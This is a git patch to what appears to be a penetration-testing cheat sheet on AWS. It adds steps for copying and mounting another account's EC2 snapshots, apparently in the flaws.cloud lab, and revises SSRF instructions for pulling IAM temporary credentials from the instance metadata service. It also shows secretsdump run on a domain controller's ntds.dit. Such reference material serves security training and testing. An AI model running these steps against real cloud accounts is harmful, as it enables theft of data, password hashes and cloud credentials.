From 255aaec3995126b07bbc56113561429083160183 Mon Sep 17 00:00:00 2001
From: Swissky <12152583+swisskyrepo@users.noreply.github.com>
Date: Sun, 15 Sep 2024 22:00:29 +0200
Subject: [PATCH] EC2 Snapshots
---
 docs/cloud/aws/aws-ec2.md | 25 +++++++++++++++++++++++++
 docs/cloud/aws/aws-metadata.md | 10 +++++-----
 2 files changed, 30 insertions(+), 5 deletions(-)
diff --git a/docs/cloud/aws/aws-ec2.md b/docs/cloud/aws/aws-ec2.md
index f95e62b..a13407b 100644
--- a/docs/cloud/aws/aws-ec2.md
+++ b/docs/cloud/aws/aws-ec2.md
@@ -73,6 +73,31 @@ aws ec2 terminate-instances --instance-id "i-0546910a0c18725a1" --region eu-west
 14. locally run `"secretsdump.py -system ./SYSTEM -ntds ./ntds.dit local -outputfile secrets'`, expects secretsdump to be on path
+## Access Snapshots
+
+1. Get the `owner-id`
+ ```powershell
+ $ aws --profile flaws sts get-caller-identity
+ "Account": "XXXX26262029",
+ ```
+2. List snapshots
+ ```powershell
+ $ aws --profile flaws ec2 describe-snapshots --owner-id XXXX26262029 --region us-west-2
+ "SnapshotId": "snap-XXXX342abd1bdcb89",
+ ```
+3. Create a volume using the previously obtained `snapshotId`
+ ```powershell
+ $ aws --profile swk ec2 create-volume --availability-zone us-west-2a --region us-west-2 --snapshot-id snap-XXXX342abd1bdcb89
+ ```
+4. In AWS console, deploy a new EC2 Ubuntu based, attach the volume and then mount it on the machine.
+ ```ps1
+ $ ssh -i YOUR_KEY.pem ubuntu@ec2-XXX-XXX-XXX-XXX.us-east-2.compute.amazonaws.com
+ $ lsblk
+ $ sudo file -s /dev/xvda1
+ $ sudo mount /dev/xvda1 /mnt
+ ```
+
+
 ## Instance Connect
 Push an SSH key to EC2 instance
diff --git a/docs/cloud/aws/aws-metadata.md b/docs/cloud/aws/aws-metadata.md
index aa317f4..f0df10a 100644
--- a/docs/cloud/aws/aws-metadata.md
+++ b/docs/cloud/aws/aws-metadata.md
@@ -15,9 +15,9 @@ curl -H "X-aws-ec2-metadata-token:$TOKEN" -v "http://169.254.169.254/latest/meta
 ## Method for Elastic Cloud Compute (EC2)
-Example : https://awesomeapp.com/forward?target=http://169.254.169.254/latest/meta-data/iam/security-credentials/Awesome-WAF-Role/
+Amazon provides an internal service that allows every EC2 instance to query and retrieve metadata about the host. If you discover an SSRF vulnerability running on an EC2 instance, try to fetch the content from 169.254.169.254.
-1. Access the IAM : https://awesomeapp.com/forward?target=http://169.254.169.254/latest/meta-data/
+1. Access the IAM : [http://169.254.169.254/latest/meta-data/](http://169.254.169.254/latest/meta-data/)
 ```powershell
 ami-id
 ami-launch-index
@@ -30,8 +30,8 @@ Example : https://awesomeapp.com/forward?target=http://169.254.169.254/latest/me
 instance-action
 instance-id
 ```
-2. Find the name of the role assigned to the instance : https://awesomeapp.com/forward?target=http://169.254.169.254/latest/meta-data/iam/security-credentials/
-3. Extract the role's temporary keys : https://awesomeapp.com/forward?target=http://169.254.169.254/latest/meta-data/iam/security-credentials/Awesome-WAF-Role/
+2. Find the name of the role assigned to the instance : [http://169.254.169.254/latest/meta-data/iam/security-credentials/](http://169.254.169.254/latest/meta-data/iam/security-credentials/)
+3. Extract the role's temporary keys : [http://169.254.169.254/latest/meta-data/iam/security-credentials//](http://169.254.169.254/latest/meta-data/iam/security-credentials//)
 ```powershell
 {
 "Code" : "Success",
@@ -69,7 +69,7 @@ Example : https://awesomeapp.com/forward?target=http://169.254.169.254/latest/me
 ## AWS API calls that return credentials
-- chime:createapikey
+- [chime:createapikey](https://docs.aws.amazon.com/service-authorization/latest/reference/list_amazonchime.html)
 - [codepipeline:pollforjobs](https://docs.aws.amazon.com/codepipeline/latest/APIReference/API_PollForJobs.html)
 - [cognito-identity:getopenidtoken](https://docs.aws.amazon.com/cognitoidentity/latest/APIReference/API_GetOpenIdToken.html)
 - [cognito-identity:getopenidtokenfordeveloperidentity](https://docs.aws.amazon.com/cognitoidentity/latest/APIReference/API_GetOpenIdTokenForDeveloperIdentity.html)